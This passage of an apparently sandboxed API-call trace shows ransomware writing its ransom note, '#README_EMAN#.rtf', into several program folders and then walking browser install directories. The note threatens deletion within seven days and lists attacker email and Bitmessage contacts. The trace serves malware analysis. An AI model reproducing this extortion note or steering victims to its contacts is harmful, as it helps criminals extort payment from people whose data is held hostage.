\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4ac18, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x9fê\x01MË2»Ta\\Ö\x9c*``i\x1dAÄà\x99Ö\x06Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0218.220] WriteFile (in: hFile=0x228, lpBuffer=0x1f4ac18*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4ac18*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0218.221] CloseHandle (hObject=0x228) returned 1 [0218.221] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\#readme_eman#.rtf")) returned 0x20 [0218.221] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\#readme_eman#.rtf")) returned 0x20 [0218.221] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\#README_EMAN#.rtf" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\deploy\\#readme_eman#.rtf")) returned 0x20 [0218.222] Sleep (dwMilliseconds=0x3e8) [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount2=78) returned 3 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount2=78) returned 2 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 3 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 3 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount2=63) returned 2 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\", cchCount1=63, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount2=62) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount2=62) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount2=62) returned 2 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\", cchCount2=102) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\", cchCount2=102) returned 3 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\", cchCount2=102) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\", cchCount2=102) returned 3 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\", cchCount1=102, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\", cchCount2=102) returned 2 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\VisualElements\\", cchCount1=78, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\", cchCount2=58) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\", cchCount2=58) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\", cchCount2=58) returned 3 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\", cchCount1=102, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\", cchCount2=53) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\", cchCount2=53) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\", cchCount2=53) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\WidevineCdm\\_platform_specific\\win_x64\\", cchCount1=102, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount2=56) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\extensions\\", cchCount1=58, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount2=56) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount2=56) returned 3 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount2=39) returned 2 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 3 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\", cchCount1=39, lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount2=51) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\features\\", cchCount1=56, lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount2=51) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\browser\\VisualElements\\", cchCount1=62, lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount2=51) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\defaults\\pref\\", cchCount1=53, lpString2="C:\\Program Files (x86)\\Mozilla Maintenance Service\\", cchCount2=51) returned 1 [0219.653] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Mozilla 